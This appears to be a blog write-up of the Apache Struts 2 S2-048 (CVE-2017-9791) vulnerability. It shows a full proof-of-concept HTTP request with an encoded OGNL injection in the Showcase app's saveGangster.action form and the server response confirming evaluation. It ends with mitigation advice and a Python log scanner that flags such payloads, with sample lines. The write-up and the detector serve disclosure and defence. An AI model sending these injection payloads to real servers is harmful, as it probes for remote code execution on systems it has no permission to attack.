It seems like only yesterday that S2-045, the Jakarta Multipart vulnerability, was being actively exploited in the wild, allowing remote attackers to execute arbitrary code. A few hours ago a new and equally exploitable advisory, S2-048, was made public by the Apache foundation. This is a quick write-up to see whether we can test an exploit for this Apache Struts 2 vulnerability and create proof-of-concept code. The vulnerability has been assigned CVE-2017-9791.
What is the Apache Struts2 S2-048 vulnerability about?
The advisory describes it as: "Possible RCE in the Struts Showcase app in the Struts 1 plugin example in Struts 2.3.x series." It further states: "It is possible to perform a RCE attack with a malicious field value when using the Struts 2 Struts 1 plugin and it's a Struts 1 action and the value is a part of a message presented to the user, i.e. when using untrusted input as a part of the error message in the ActionMessage class."
From the above we know that the vulnerability exists in the Struts 1 plugin example of the Apache Struts 2.3.x Showcase application, which is accessible at /struts2-showcase/. The solution section of the Apache advisory page also says:
Always use resource keys instead of passing a raw message to the ActionMessage, as shown below; never pass a raw value directly:
messages.add("msg", new ActionMessage("struts1.gangsterAdded", gform.getName()));
and never like this:
messages.add("msg", new ActionMessage("Gangster " + gform.getName() + " was added"));
With this information, I found a matching file name at this location: /struts2-showcase/integration/saveGangster.action
Taking this forward, I visited my Apache Struts2 installation to find this:
I tried it with the addHeader exploit to get:
Request to http://10.10.31.170:8080/struts2-showcase/integration/saveGangster.action:

POST /struts2-showcase/integration/saveGangster.action HTTP/1.1
Host: 10.10.31.170:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 194
Cookie: JSESSIONID=2088284AD58C3255F3171251F97EFA9A
Connection: keep-alive
Upgrade-Insecure-Requests: 1

age=bbb&__checkbox_bustedBefore=true&name=%24%7B%7B%23context%5B%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%5D.addHeader%28%27X-PenTestIT%27%2C3333-2222%29%7D%7D&description=ccc

Response:

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-PenTestIT: 1111
Content-Type: text/html;charset=ISO-8859-1
Transfer-Encoding: chunked
Date: Fri, 07 Jul 2017 21:07:52 GMT
Notice the X-PenTestIT header in the response above? Its value is 1111, the result of the 3333-2222 expression injected into the name field, which confirms that the field value was evaluated as an OGNL expression on the server.
With the OGNL exploit:
Possible ways to protect against the Apache Struts2 S2-048 vulnerability:
Follow the solution Apache mentions. I would rather say: disable the Showcase app. Updating to Apache Struts 2.3.33 should also help.
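As an added example that is not part of the original post, the following Python script shows how a defender can spot S2-048 style probes like the request above in web logs: it decodes the POST body (including a second decoding pass for double-encoded values) and flags form fields carrying OGNL expression syntax aimed at the vulnerable saveGangster.action. The log format and the sample lines are constructed for this example; adapt the line parser to your server's actual access-log layout.

```python
import re
from urllib.parse import parse_qs, unquote_plus

# Path of the Struts 1 plugin example action from the write-up above
TARGET_PATH = "/struts2-showcase/integration/saveGangster.action"

# OGNL expression delimiters and the #context object used in the probe above.
# Any of these inside a form field value is a strong signal of an injection attempt.
OGNL_MARKERS = re.compile(r"\$\{|%\{|#context\b")

# Constructed sample lines (not real traffic): "METHOD PATH STATUS BODY"
SAMPLE_LOG = """\
POST /struts2-showcase/integration/saveGangster.action 200 age=bbb&__checkbox_bustedBefore=true&name=%24%7B%7B%23context%5B%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%5D.addHeader%28%27X-PenTestIT%27%2C3333-2222%29%7D%7D&description=ccc
POST /struts2-showcase/integration/saveGangster.action 200 age=30&name=Al+Capone&description=Chicago
POST /struts2-showcase/integration/saveGangster.action 200 age=1&name=%2524%257B1%2B1%257D&description=x
GET /struts2-showcase/integration/editGangster.action 200 -
"""

def suspicious_fields(body):
    """Return {field: decoded_value} for fields whose decoded value contains OGNL syntax."""
    hits = {}
    for field, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            # Decode a second time so double-encoded payloads (%2524 -> %24 -> $) are caught too
            for candidate in (value, unquote_plus(value)):
                if OGNL_MARKERS.search(candidate):
                    hits[field] = candidate
                    break
    return hits

def scan_log(text):
    """Return (line_no, field, value) for POSTs to the vulnerable action carrying OGNL markers."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        parts = line.split(" ", 3)
        if len(parts) < 4:
            continue
        method, path, _status, body = parts
        if method != "POST" or path != TARGET_PATH:
            continue
        for field, value in suspicious_fields(body).items():
            findings.append((n, field, value))
    return findings

if __name__ == "__main__":
    for n, field, value in scan_log(SAMPLE_LOG):
        print(f"line {n}: OGNL syntax in field '{field}': {value}")
```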